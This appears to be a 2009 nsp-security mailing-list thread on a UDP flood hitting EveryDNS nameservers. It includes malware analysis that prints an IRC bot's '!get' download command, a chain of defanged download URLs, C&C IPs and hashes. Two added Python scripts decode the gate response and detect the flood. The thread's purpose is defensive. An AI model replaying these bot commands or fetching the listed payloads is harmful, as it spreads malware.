[nsp-sec] DDoS to EveryDNS nameserver IPs
White, Gerard
Gerard.White at aliant.ca
Wed Feb 4 20:12:08 EST 2009
Ladies:
irc.zief.pl on TCP/80
JOIN #.364
PRIVMSG :!get hxxp://horobl.cn/ex/a.php
Name: horobl.cn
Address: 211.95.79.6 (Note Typo from Below???)
HTTP/1.1 200 OK
Server: nginx
MD5: dc9f67ae1d175386625c97fcf22c77ab
11776 Bytes:
http://www.virustotal.com/analisis/34c33485e6a0f326bf75b15cd2ae404c
Which then triggers:
GET hxxp://mega/lgate.php?n=<ID>
With a response of:
HTTP/1.1 200 OK
Server: nginx
Content-Length: 44
MCBodHRwOi8vc2V0ZG9jLmNuL2Rsay9jYWUuZXhlIDE=
Which decodes to:
GET hxxp://setdoc.cn/dlk/cae.exe
With a response of:
HTTP/1.1 200 OK
Date: Thu, 05 Feb 2009 08:39:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 03 Feb 2009 17:54:41 GMT
ETag: "154000f-1ae00-5d923a40"
Accept-Ranges: bytes
Content-Length: 110080
Connection: close
Content-Type: application/octet-stream
MD5: deac9c705ed0f4e4c1d0f3c5bb9aa9c1
http://www.virustotal.com/analisis/2cc2c169bfea6ee56d3298fc853d2355
Uses RSA crypto... drops a file "bogoa.exe"
MD5: 0c524d62abc45d466bd812b091b5d7b0
http://www.virustotal.com/analisis/a9ae781773cba091485e3863c40c1ab4
GW
855 - Bell Aliant
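The 44-byte response from lgate.php above is a base64 string that decodes to the next download location. The script below, an added example rather than code from the thread, decodes that body, checks it against the Content-Length the capture reported, and turns the URL it contains into a defanged indicator for a report. The sample string is the one quoted in the message; the field layout (a numeric flag before and after the URL) is read off that single sample and is an assumption, not documented behaviour of the malware.

```python
"""Decode the base64 body returned by the lgate.php request and turn the
embedded download URL into a defanged indicator.

Added example, not code from the thread. The field layout (flag, URL,
flag) is inferred from the one sample quoted in the message and is an
assumption, not documented behaviour of the malware.
"""
import base64
import binascii
import re
from typing import Optional
from urllib.parse import urlsplit

# Constructed from the Content-Length: 44 response quoted in the thread.
SAMPLE_GATE_BODY = "MCBodHRwOi8vc2V0ZG9jLmNuL2Rsay9jYWUuZXhlIDE="

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def defang(url: str) -> str:
    """Render a URL as hxxp://host[.]tld/... so it cannot be clicked or auto-fetched."""
    parts = urlsplit(url)
    scheme = "hxxps" if parts.scheme.lower() == "https" else "hxxp"
    host = parts.netloc.replace(".", "[.]")
    query = f"?{parts.query}" if parts.query else ""
    return f"{scheme}://{host}{parts.path}{query}"


def decode_gate_response(body: str, expected_length: Optional[int] = None) -> dict:
    """Decode one gate response body and extract the download URL.

    Returns the decoded text, its whitespace-separated fields, the first
    http(s) URL found (or None), that URL's host, a defanged copy and the
    file name it points at.  Raises ValueError when the body is not valid
    base64 or its size disagrees with the Content-Length header recorded
    in the capture, so a truncated capture is reported instead of being
    decoded to garbage.
    """
    body = body.strip()
    if expected_length is not None and len(body) != expected_length:
        raise ValueError(f"body is {len(body)} bytes, Content-Length said {expected_length}")
    try:
        raw = base64.b64decode(body, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"not valid base64: {exc}") from exc

    text = raw.decode("ascii", errors="replace")
    match = URL_RE.search(text)
    url = match.group(0) if match else None
    return {
        "decoded": text,
        "fields": text.split(),
        "url": url,
        "host": urlsplit(url).hostname if url else None,
        "defanged": defang(url) if url else None,
        "filename": urlsplit(url).path.rsplit("/", 1)[-1] if url else None,
    }


if __name__ == "__main__":
    info = decode_gate_response(SAMPLE_GATE_BODY, expected_length=44)
    print("decoded :", info["decoded"])
    print("download:", info["defanged"], "->", info["filename"])
```

The length check matters more than it looks: a gate response cut short by a proxy or a sandbox timeout still base64-decodes to something, and the resulting half-URL would end up in a blocklist as a bad indicator. Failing loudly on a size mismatch keeps the extracted host and file name trustworthy.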
-----Original Message-----
From: nsp-security-bounces at puck.nether.net
[mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Stephen Gill
Sent: Wednesday, February 04, 2009 7:49 PM
To: David Ulevitch; nsp-security at puck.nether.net
Subject: Re: [nsp-sec] DDoS to EveryDNS nameserver IPs
----------- nsp-security Confidential --------
Supposedly these are the likely C&C candidates after a very helpful
individual took a brief glance at an infected machine:
9800 | 211.95.76.6 | UNICOM CHINA UNICOM
23898 | 58.65.232.34 | HOSTFRESH-AS-AP HostFresh Internet
I've fired up the malware on our Sandbox to see if it matches up. There are
quite a few varieties of this file and almost 0 AV pick it up.
You can also google for the most recent sample:
SHA1 a5396141cab8b22d9d88b28a814089537dce366a
MD5 01c3346c241652f43aed8e2149881bfe
Lawrence should have a seccheck now.
PID 1252 204.184.73.43:1168 58.65.232.34:80 ESTABLISHED
winlogon.exe \??\C:\WINDOWS\SYSTEM32\winlogon.exe
PID 1252 204.184.73.43:1175 211.95.79.6:80 ESTABLISHED
winlogon.exe \??\C:\WINDOWS\SYSTEM32\winlogon.exe
-- steve
On 2/4/09 11:39 AM, "David Ulevitch" <david at opendns.com> wrote:
> ----------- nsp-security Confidential --------
>
> I'm currently receiving a large DDoS to all my EveryDNS nameserver IPs:
>
> ns1.everydns.net has address 208.76.56.56
> ns2.everydns.net has address 78.129.207.168
> ns3.everydns.net has address 71.6.202.220
> ns4.everydns.net has address 208.96.6.134
>
> The DDoS appears to all be UDP packets of length 1000 bytes.
>
> Here's what I mean:
>
> 01:39:20.107917 IP 115.186.96.138.58798 > 208.76.56.56.2194: UDP, length 1000
> 01:39:20.107959 IP 82.212.143.159.2270 > 208.76.56.56.4000: UDP, length 1000
> 01:39:20.107969 IP 187.10.195.160.60001 > 208.76.56.56.2105: UDP, length 1000
> 01:39:20.107986 IP 189.119.47.137.25664 > 208.76.56.56.908: UDP, length 1000
> 01:39:20.107991 IP 213.189.175.47.3732 > 208.76.56.56.3804: UDP, length 1000
> 01:39:20.108012 IP 202.41.85.244.22349 > 208.76.56.56.3119: UDP, length 1000
> 01:39:20.108089 IP 89.174.93.234.4675 > 208.76.56.56.3589: UDP, length 1000
>
> Anyone know what this looks like or anything I can do to stop it...
>
> 3 of the 4 nameservers are offline right now, and I'm working with
> some folks to bring up some more machines now. Ironically, I'm at the
> ICANN DNS meeting at GATech right now with a bunch of you. :-)
>
> Thanks,
> David Ulevitch
> 415 971 6916
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________
--
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 312 924 4023 | gillsr at cymru.com
_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security
Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
community. Confidentiality is essential for effective Internet security
counter-measures.
_______________________________________________
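The tcpdump excerpt in David's message shows the shape of the flood: many distinct sources, a single destination, every datagram exactly 1000 bytes, and destination ports scattered at random. That combination is easy to pick out mechanically. The script below is an added example, not code from the thread; it parses tcpdump's one-line UDP summaries and raises one alert per destination whose traffic in a short window comes from many sources with a near-uniform payload length. The sample lines are the seven quoted above, rejoined; the benign lines and the thresholds (window, source count, length share) are constructed, illustrative choices, not values from the thread.

```python
"""Flag a fixed-size UDP flood in tcpdump output: many sources, one
destination, every datagram the same length, destination ports scattered.

Added example, not code from the thread. SAMPLE_TCPDUMP is the excerpt
quoted in the thread with its wrapped lines rejoined; BENIGN_TCPDUMP and
the thresholds are constructed for illustration and would be tuned to the
nameserver's normal query load in practice.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# The seven lines quoted in the thread, rejoined onto single lines.
SAMPLE_TCPDUMP = """\
01:39:20.107917 IP 115.186.96.138.58798 > 208.76.56.56.2194: UDP, length 1000
01:39:20.107959 IP 82.212.143.159.2270 > 208.76.56.56.4000: UDP, length 1000
01:39:20.107969 IP 187.10.195.160.60001 > 208.76.56.56.2105: UDP, length 1000
01:39:20.107986 IP 189.119.47.137.25664 > 208.76.56.56.908: UDP, length 1000
01:39:20.107991 IP 213.189.175.47.3732 > 208.76.56.56.3804: UDP, length 1000
01:39:20.108012 IP 202.41.85.244.22349 > 208.76.56.56.3119: UDP, length 1000
01:39:20.108089 IP 89.174.93.234.4675 > 208.76.56.56.3589: UDP, length 1000
"""

# Constructed: ordinary DNS queries, two clients, varying sizes, port 53.
BENIGN_TCPDUMP = """\
01:40:01.000100 IP 192.0.2.10.40001 > 208.76.56.56.53: UDP, length 45
01:40:01.000300 IP 192.0.2.10.40002 > 208.76.56.56.53: UDP, length 61
01:40:01.000500 IP 192.0.2.11.40003 > 208.76.56.56.53: UDP, length 58
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3})\.(?P<dport>\d+): UDP, length (?P<len>\d+)$"
)


def parse_tcpdump(text: str) -> List[Dict]:
    """Parse tcpdump's default one-line UDP summaries (numeric addresses,
    i.e. captured with -n).  Lines in any other form are skipped, not guessed."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        records.append({
            "ts": datetime.strptime(m["ts"], "%H:%M:%S.%f"),
            "src": m["src"], "sport": int(m["sport"]),
            "dst": m["dst"], "dport": int(m["dport"]),
            "len": int(m["len"]),
        })
    return records


def detect_udp_flood(records: List[Dict], window_ms: int = 100,
                     min_sources: int = 5, uniform_share: float = 0.9) -> List[Dict]:
    """Return one alert per destination that, inside some window_ms slice,
    receives UDP from at least min_sources distinct sources with at least
    uniform_share of the datagrams sharing one payload length.  The alert
    describes the busiest such window; distinct_dports shows whether the
    traffic targets a service port or is sprayed across random ports."""
    by_dst = defaultdict(list)
    for r in records:
        by_dst[r["dst"]].append(r)

    window = timedelta(milliseconds=window_ms)
    alerts = []
    for dst, recs in by_dst.items():
        recs.sort(key=lambda r: r["ts"])
        best = None
        j = 0
        for i in range(len(recs)):
            # Advance the right edge so recs[i:j] spans at most window_ms.
            while j < len(recs) and recs[j]["ts"] - recs[i]["ts"] <= window:
                j += 1
            chunk = recs[i:j]
            sources = {r["src"] for r in chunk}
            if len(sources) < min_sources:
                continue
            length, count = Counter(r["len"] for r in chunk).most_common(1)[0]
            share = count / len(chunk)
            if share < uniform_share:
                continue
            candidate = {
                "dst": dst,
                "window_start": chunk[0]["ts"].strftime("%H:%M:%S.%f"),
                "packets": len(chunk),
                "sources": len(sources),
                "length": length,
                "length_share": round(share, 3),
                "distinct_dports": len({r["dport"] for r in chunk}),
            }
            if best is None or candidate["sources"] > best["sources"]:
                best = candidate
        if best is not None:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_udp_flood(parse_tcpdump(SAMPLE_TCPDUMP)):
        print(alert)
    print("benign:", detect_udp_flood(parse_tcpdump(BENIGN_TCPDUMP)))
```

On the quoted lines this yields a single alert for 208.76.56.56 with seven sources, seven distinct destination ports and a 100% share of length-1000 datagrams, while the constructed DNS lines produce nothing. The distinct_dports field is the useful part for response: traffic sprayed at random high ports never reaches the nameserver process at all, so it can be dropped upstream on length and port without touching legitimate port-53 queries.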